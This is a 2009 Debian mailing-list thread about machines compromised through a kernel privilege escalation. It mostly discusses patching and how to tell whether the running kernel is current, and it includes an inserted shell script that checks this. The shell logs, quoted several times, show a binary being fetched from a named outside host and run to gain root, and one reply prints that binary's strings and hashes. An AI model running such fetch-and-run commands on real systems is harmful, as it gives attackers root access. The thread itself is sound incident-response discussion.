rootkit not found by rkhunter


rootkit not found by rkhunter

Thomas Krichel

  I am running debian testing, 2.6.30 kernel.

  I have a rootkit installed on a bunch of machines that rkhunter
  does not find. This appears after infection with SHV4 / SHV5,
  which rkhunter found.

  Here it works to allow a non-root user to become root

krichel@fricka:~$ mkdir a
krichel@fricka:~$ cd a
krichel@fricka:~/a$ ls -l
total 0
krichel@fricka:~/a$  wget webmail.facill.com.br/a
--2009-10-04 07:47:42--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       6.88K/s   in 1.0s    

2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]

krichel@fricka:~/a$ chmod 777 a
krichel@fricka:~/a$ ./a
root@fricka:~/a#

  Here is a situation where it does not work

krichel@chichek:~$ mkdir a
krichel@chichek:~$ cd a
krichel@chichek:~/a$ wget webmail.facill.com.br/a
--2009-10-04 07:31:15--  http://webmail.facill.com.br/a
Resolving webmail.facill.com.br... 201.65.241.194
Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6886 (6.7K) [text/plain]
Saving to: `a'

100%[======================================>] 6,886       37.8K/s   in 0.2s    

2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]

krichel@chichek:~/a$ chmod 777 a
krichel@chichek:~/a$ ./a
mmap: Permission denied


  Does anybody here know how to delete this kit?


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel



--
To UNSUBSCRIBE, email to [hidden email]
with a subject of "unsubscribe". Trouble? Contact [hidden email]


Re: rootkit not found by rkhunter

cornichon
Thomas Krichel wrote:

>   I am running debian testing, 2.6.30 kernel.
>
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
>
>   Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s   in 1.0s    
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
>   Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s   in 0.2s    
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
>   Does anybody here know how to delete this kit?
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel
>
>
>

don't understand the difference between the two situations? ^^



Re: rootkit not found by rkhunter

Bastian Blank
In reply to this post by Thomas Krichel
On Sun, Oct 04, 2009 at 10:15:35AM -0400, Thomas Krichel wrote:
>   I am running debian testing, 2.6.30 kernel.

This kernel lacks a few security fixes.

>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.

Why do you think this is a rootkit?

Bastian

--
Leave bigotry in your quarters; there's no room for it on the bridge.
                -- Kirk, "Balance of Terror", stardate 1709.2



Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 10:15:35 -0400 Thomas Krichel wrote:
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
...
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied

this looks like a standard privilege escalation (not a rootkit). it
appears to be using one of the recent null pointer dereference kernel
vulnerabilities.  your fricka machine is probably running one of the
unpatched kernels ('uname -r' will tell you which version you are
currently running).  chichek is up to date since it is preventing
the dereferenced pointer from accessing mmap.

'apt-get update && apt-get upgrade' followed by a reboot into the new
kernel should bring you up to date.

mike



Re: rootkit not found by rkhunter

Henri Salo-5
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 10:15:35 -0400
Thomas Krichel <[hidden email]> wrote:

>   I am running debian testing, 2.6.30 kernel.
>
>   I have a rootkit installed on a bunch of machines that rkhunter
>   does not find. This appears after infection with SHV4 / SHV5,
>   which rkhunter found.
>
>   Here it works to allow a non-root user to become root
>
> krichel@fricka:~$ mkdir a
> krichel@fricka:~$ cd a
> krichel@fricka:~/a$ ls -l
> total 0
> krichel@fricka:~/a$  wget webmail.facill.com.br/a
> --2009-10-04 07:47:42--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       6.88K/s   in 1.0s
>
> 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886]
>
> krichel@fricka:~/a$ chmod 777 a
> krichel@fricka:~/a$ ./a
> root@fricka:~/a#
>
>   Here is a situation where it does not work
>
> krichel@chichek:~$ mkdir a
> krichel@chichek:~$ cd a
> krichel@chichek:~/a$ wget webmail.facill.com.br/a
> --2009-10-04 07:31:15--  http://webmail.facill.com.br/a
> Resolving webmail.facill.com.br... 201.65.241.194
> Connecting to webmail.facill.com.br|201.65.241.194|:80... connected.
> HTTP request sent, awaiting response... 200 OK
> Length: 6886 (6.7K) [text/plain]
> Saving to: `a'
>
> 100%[======================================>] 6,886       37.8K/s   in 0.2s
>
> 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886]
>
> krichel@chichek:~/a$ chmod 777 a
> krichel@chichek:~/a$ ./a
> mmap: Permission denied
>
>
>   Does anybody here know how to delete this kit?
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

This file should at least be deleted from the host.

fgeek@foo:~$ file a
a: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.9, not
stripped
fgeek@foo:~$ strings a
/lib/ld-linux.so.2
__gmon_start__
libc.so.6
_IO_stdin_used
socket
exit
execl
ftruncate
perror
sendfile
unlink
mkstemp
mmap
getpagesize
getgid
getuid
__libc_start_main
GLIBC_2.1
GLIBC_2.0
PTRh
([^_]
[^_]
mmap
socket
mkstemp
unlink
ftruncate
/bin/sh
/tmp/tmp.XXXXXX
fgeek@foo:~$ md5sum a
b950af01be61a8cbf5d479430738bd18  a
fgeek@foo:~$ sha1sum a
639536caea56554406106ad8679115971485f3a2  a



Re: rootkit not found by rkhunter

Thomas Krichel
In reply to this post by Michael Gilbert
  Michael S Gilbert writes

> this looks like a standard privilege escalation (not a rootkit). it
> appears to be using one of the recent null pointer dereference kernel
> vulnerabilities.  your fricka machine is probably running one of the
> unpatched kernels ('uname -r' will tell you which version you are
> currently running).  chichek is up to date since it is preventing
> the dereferenced pointer from accessing mmap.

  Hmmmm, here is a list of machines affected and unaffected, with
  their kernel version

affected
fricka  2.6.26-2-686
wotan   2.6.30-1-686
raneb   2.6.22-3-686
loge    2.6.26-2-686
trabbi  2.6.26-2-686
mutabor 2.6.26-2-686

not affected
khufu   2.6.30-1-686
chichek 2.6.30-1-686
nebka   2.6.26-2-686
sahure  2.6.30-1-amd64
snefru  2.6.30-1-686

  On Tuesday I replaced all but /root /etc /var and /home on wotan,
  which was the machine that has the SHV4/SHV5. It runs the latest
  kernel. A cracker came in as a non-privileged user without deleting
  his history, that's how I found out how he got root. I spotted the
  break from root's deleted .bash_history and the user he got in as
  from /var/log/auth.log.

  It looks like the affected machines run older kernels, so
  I will follow your advice and upgrade.

  Thanks and cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel



Re: rootkit not found by rkhunter

Thomas Krichel
In reply to this post by Michael Gilbert
  Michael S Gilbert writes

> 'apt-get update && apt-get upgrade' followed by a reboot into the new
> kernel should bring you up to date.

  Since I just downloaded the kernel last week I did not really
  believe your advice but I have rebooted and the problem appears
  gone!


  Cheers,

  Thomas Krichel                    http://openlib.org/home/krichel
                                RePEc:per:1965-06-05:thomas_krichel
                                               skype: thomaskrichel



Re: rootkit not found by rkhunter

Noah Meyerhans
In reply to this post by Thomas Krichel
On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:

> > this looks like a standard privilege escalation (not a rootkit). it
> > appears to be using one of the recent null pointer dereference kernel
> > vulnerabilities.  your fricka machine is probably running one of the
> > unpatched kernels ('uname -r' will tell you which version you are
> > currently running).  chichek is up to date since it is preventing
> > the dereferenced pointer from accessing mmap.
>
>   Hmmmm, here is a list of machines affected and unaffected, with
>   their kernel version
>
> affected
> fricka  2.6.26-2-686
  ...

The kernel version reported by uname is not enough to determine the
security status of the kernel.  The kernel version number only changes
when the kernel ABI changes.  Security updates are often applied
without ABI bumps.  For example, kernel 2.6.26-2-686 was introduced by
linux 2.6.26-14.  However, the current version is 2.6.26-19.  Several
security fixes were introduced in the various releases between those two
versions, yet the version reported by uname was unchanged.  You need to
make sure that the machine actually gets rebooted when security updates
are made.

AFAIK, the best way to know if you're running a stale kernel is to
compare the uptime of the machine against the mtime of the actual kernel
(using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
machine places the last reboot sometime before the kernel was updated,
you're not up to date.  If there's a better way to test this, I'd love
to know about it.

noah



Re: rootkit not found by rkhunter

Henri Salo-5
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 12:10:04 -0400
Thomas Krichel <[hidden email]> wrote:

>   Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the
> > new kernel should bring you up to date.
>
>   Since I just downloaded the kernel last week I did not really
>   believe your advice but I have rebooted and the problem appears
>   gone!
>
>
>   Cheers,
>
>   Thomas Krichel                    http://openlib.org/home/krichel
>                                 RePEc:per:1965-06-05:thomas_krichel
>                                                skype: thomaskrichel

You should use apticron and apt-dater.

---
Henri Salo



Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
>   It looks like the affected machines run older kernels, so
>   I will follow your advice and upgrade.

i forgot to mention that 'uname -r' won't actually tell you whether you
are running the most up-to-date debian kernel.  to do that, look at the
output of 'dpkg -l | grep linux-image-$(uname -r)'.  you should have
2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
where your 2.6.22 version came from, but i would recommend installing
an official kernel package instead of that one; otherwise you have no
security support at all).

mike



Re: rootkit not found by rkhunter

Michael Gilbert
In reply to this post by Thomas Krichel
On Sun, 4 Oct 2009 12:10:04 -0400 Thomas Krichel wrote:

>   Michael S Gilbert writes
>
> > 'apt-get update && apt-get upgrade' followed by a reboot into the new
> > kernel should bring you up to date.
>
>   Since I just downloaded the kernel last week I did not really
>   believe your advice but I have rebooted and the problem appears
>   gone!

right, kernel updates do not apply until after reboot.  the latest
kernel images no longer warn about this, which has led to an increased
number of users opting not to reboot after upgrade (at least from
the volume of similar resolutions to postings on this list recently).

kernel team, would it be possible to get this warning reintroduced or
added to the notification daemon?  we want to keep users informed about
the actions they need to take to stay secure, right?

mike



Re: rootkit not found by rkhunter

Török Edwin
In reply to this post by Noah Meyerhans
On 2009-10-04 19:10, Noah Meyerhans wrote:

> On Sun, Oct 04, 2009 at 11:44:52AM -0400, Thomas Krichel wrote:
>  
>>> this looks like a standard privilege escalation (not a rootkit). it
>>> appears to be using one of the recent null pointer dereference kernel
>>> vulnerabilities.  your fricka machine is probably running one of the
>>> unpatched kernels ('uname -r' will tell you which version you are
>>> currently running).  chichek is up to date since it is preventing
>>> the dereferenced pointer from accessing mmap.
>>>      
>>   Hmmmm, here is a list of machines affected and unaffected, with
>>   their kernel version
>>
>> affected
>> fricka  2.6.26-2-686
>>    
>   ...
>
> The kernel version reported by uname is not enough to determine the
> security status of the kernel.  The kernel version number only changes
> when the kernel ABI changes.  Security updates are often applied
> without ABI bumps.  For example, kernel 2.6.26-2-686 was introduced by
> linux 2.6.26-14.  However, the current version is 2.6.26-19.  Several
> security fixes were introduced in the various releases between those two
> versions, yet the version reported by uname was unchanged.  

Why is not EXTRAVERSION updated during the kernel package build?

Best regards,
--Edwin



Re: rootkit not found by rkhunter

Noah Meyerhans-3
On Sun, Oct 04, 2009 at 07:35:53PM +0300, Török Edwin wrote:
>
> Why is not EXTRAVERSION updated during the kernel package build?
>

EXTRAVERSION indicates the ABI version number.  It's only updated when
that changes, in order to indicate that the new kernel is not compatible
with the old one and that external modules (e.g. the ati or nvidia
graphics drivers) need to be rebuilt.

noah



Re: rootkit not found by rkhunter

Mark van Walraven
In reply to this post by Noah Meyerhans
> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date.  If there's a better way to test this, I'd love
> to know about it.

Comparing the outputs of:

        sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version

and:

        dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
                awk '/^Version: / {print $2}'

has worked well for me - thanks to the kernel team for including the
version and revision!

Mark.
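
Added example, not part of the original post or of any Debian tool: the comparison described above as a reusable shell check, run over a constructed three-host inventory. The host names, builder address, gcc strings and build dates are constructed; the "(Debian <version>)" layout of /proc/version is assumed from the sed expression in the post, and the versions 2.6.26-14 and 2.6.26-19 are the ones quoted earlier in the thread.

```shell
#!/bin/sh
# Flag hosts whose running kernel differs from the kernel package installed
# on disk, i.e. "upgraded but never rebooted".

# Debian package version of the RUNNING kernel, from /proc/version text.
# Assumed layout:
#   Linux version <abi-name> (Debian <pkg-version>) (<builder>) (gcc ...) ...
# The pattern is anchored to the field right after the ABI name, so the
# compiler's own "(Debian x.y.z)" tag further along the line is never
# mistaken for the kernel package version.
running_pkg_version() {
    printf '%s\n' "$1" |
        sed -n 's/^Linux version [^ ]* (Debian \([^)]*\)).*/\1/p'
}

# ABI name of the running kernel: the value `uname -r` prints.
running_abi_name() {
    printf '%s\n' "$1" | awk '/^Linux version / { print $3; exit }'
}

# Installed version of the linux-image package for an ABI name.
# Prints nothing when dpkg-query or the package is missing.
installed_pkg_version() {
    command -v dpkg-query >/dev/null 2>&1 || return 0
    dpkg-query -W -f='${Version}\n' "linux-image-$1" 2>/dev/null || true
}

# kernel_status <proc-version-text> <installed-pkg-version>
# Prints: current (versions match), stale (they differ, reboot pending),
# or unknown (no package tag in /proc/version, or no installed version).
kernel_status() {
    running=$(running_pkg_version "$1")
    if [ -z "$running" ] || [ -z "$2" ]; then
        echo unknown
    elif [ "$running" = "$2" ]; then
        echo current
    else
        echo stale
    fi
}

# audit_inventory: reads "host|installed-version|/proc/version text" lines
# on stdin and prints "host abi-name status" for each.
audit_inventory() {
    while IFS='|' read -r host installed procver; do
        [ -n "$host" ] || continue
        printf '%s %s %s\n' "$host" "$(running_abi_name "$procver")" \
            "$(kernel_status "$procver" "$installed")"
    done
}

# Constructed inventory. host-a and host-b report the same `uname -r`, yet
# only host-b has booted the patched build; host-c runs a kernel carrying no
# Debian package tag at all.
SAMPLE_INVENTORY='host-a|2.6.26-19|Linux version 2.6.26-2-686 (Debian 2.6.26-14) (builder@example.invalid) (gcc version 4.1.3 (Debian 4.1.2-25)) #1 SMP Thu Jan 1 00:00:00 UTC 2009
host-b|2.6.26-19|Linux version 2.6.26-2-686 (Debian 2.6.26-19) (builder@example.invalid) (gcc version 4.1.3 (Debian 4.1.2-25)) #1 SMP Thu Jan 1 00:00:00 UTC 2009
host-c|2.6.26-19|Linux version 2.6.22-3-686 (root@example.invalid) (gcc version 4.1.3 (Debian 4.1.2-25)) #1 SMP Thu Jan 1 00:00:00 UTC 2009'

printf '%s\n' "$SAMPLE_INVENTORY" | audit_inventory
```

On a live Debian host the same functions take real data: kernel_status "$(cat /proc/version)" "$(installed_pkg_version "$(uname -r)")".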



Re: rootkit not found by rkhunter

Florian Weimer
In reply to this post by Noah Meyerhans
* Noah Meyerhans:

> AFAIK, the best way to know if you're running a stale kernel is to
> compare the uptime of the machine against the mtime of the actual kernel
> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
> machine places the last reboot sometime before the kernel was updated,
> you're not up to date.  If there's a better way to test this, I'd love
> to know about it.

What about /proc/version?  If the version stored in it is incorrect,
we should really fix that.



Re: rootkit not found by rkhunter

dann frazier
In reply to this post by Michael Gilbert
On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> >   It looks like the affected machines run older kernels, so
> >   I will follow your advice and upgrade.
>
> i forgot to mention that 'uname -r' won't actually tell you whether you
> are running the most up-to-date debian kernel.  to do that, look at the
> output of 'dpkg -l | grep linux-image-$(uname -r)'.

cat /proc/version is nice because it is the running kernel, and
includes the package version.

>  you should have
> 2.6.30-8 or higher for sid and 2.6.26-19 or higher for lenny (not sure
> where your 2.6.22 version came from, but i would recommend installing
> an official kernel package instead of that one; otherwise you have no
> security support at all).
>
> mike
>
>

--
dann frazier



running vs. installed kernel (was: rootkit not found by rkhunter)

Peter Palfrader
On Mon, 05 Oct 2009, dann frazier wrote:

> On Sun, Oct 04, 2009 at 12:16:14PM -0400, Michael S Gilbert wrote:
> > On Sun, 4 Oct 2009 11:44:52 -0400 Thomas Krichel wrote:
> > >   It looks like the affected machines run older kernels, so
> > >   I will follow your advice and upgrade.
> >
> > i forgot to mention that 'uname -r' won't actually tell you whether you
> > are running the most up-to-date debian kernel.  to do that, look at the
> > output of 'dpkg -l | grep linux-image-$(uname -r)'.
>
> cat /proc/version is nice because it is the running kernel, and
> includes the package version.

Also, maybe
http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
might be useful for some.

I don't claim it works in all the cases, or finds every weird
combination out there, but it seems to do a pretty good job of helping
us not forget to reboot systems.

I'm sure the interested parties can butcher it for parts if they don't
want all it does (i.e. maybe not everyone wants the get_avail magic).

Cheers,
weasel
--
                           |  .''`.  ** Debian GNU/Linux **
      Peter Palfrader      | : :' :      The  universal
 http://www.palfrader.org/ | `. `'      Operating System
                           |   `-    http://www.debian.org/



Re: rootkit not found by rkhunter

Jörg Sommer
In reply to this post by Mark van Walraven
Hi,

Mark van Walraven <[hidden email]> wrote:

>> AFAIK, the best way to know if you're running a stale kernel is to
>> compare the uptime of the machine against the mtime of the actual kernel
>> (using, e.g. "stat /boot/vmlinuz-2.6.26-2-686").  If the uptime of the
>> machine places the last reboot sometime before the kernel was updated,
>> you're not up to date.  If there's a better way to test this, I'd love
>> to know about it.
>
> Comparing the outputs of:
>
> sed -n 's/[^(]*(Debian \([^)]*\)).*/\1/p' /proc/version
>
> and:
>
> dpkg -s $(dpkg -S $(readlink /vmlinuz) | cut -d: -f1) |
> awk '/^Version: / {print $2}'
>
> has worked well for me - thanks to the kernel team for including the
> version and revision!

Does someone know, if rkhunter has such a check?

Bye, Jörg.
--
Our doubts are traitors, and often enough we forfeit the possible
gain because we do not dare to make the attempt.



Re: rootkit not found by rkhunter

Jörg Sommer
In reply to this post by Noah Meyerhans
Hello Noah,

Noah Meyerhans <[hidden email]> wrote:
> You need to make sure that the machine actually gets rebooted when
> security updates are made.

I thought for security fixes in modules it's enough to update/replace
the module. Isn't it?

Bye, Jörg.
--
NetBSD is for women: it runs on washing machines



Re: running vs. installed kernel

Guntram Trebs
In reply to this post by Peter Palfrader
Peter Palfrader wrote:

> On Mon, 05 Oct 2009, dann frazier wrote:
>
>  
>> cat /proc/version is nice because it is the running kernel, and
>> includes the package version.
>>    
>
> Also, maybe
> http://git.debian.org/?p=mirror/dsa-nagios.git;a=blob;f=dsa-nagios-checks/checks/dsa-check-running-kernel;hb=HEAD
> might be useful for some.
>
>  
There is also a check on Nagios Exchange
http://exchange.nagios.org/directory/Plugins/Uncategorized/Operating-Systems/Linux/Running-kernel-compared-to-installed-kernel-version-%252D-updated!/details

It deals with different versions of Debian and Ubuntu too.

By the way, on ubuntu systems this information is stored in
/proc/version_signature:
root@web1:~/bin# cat /proc/version
Linux version 2.6.28-15-server (buildd@yellow) (gcc version 4.3.3
(Ubuntu 4.3.3-5ubuntu4) ) #52-Ubuntu SMP Wed Sep 9 11:34:09 UTC 2009
root@web1:~/bin# cat /proc/version_signature
Ubuntu 2.6.28-15.52-server

Cheers,
Gunni

--
Guntram Trebs
freelance programmer and administrator

[hidden email]
+49 (30) 42 80 61 55
+49 (179) 519 82 39 (temporary)
+49 (151) 55 85 85 55


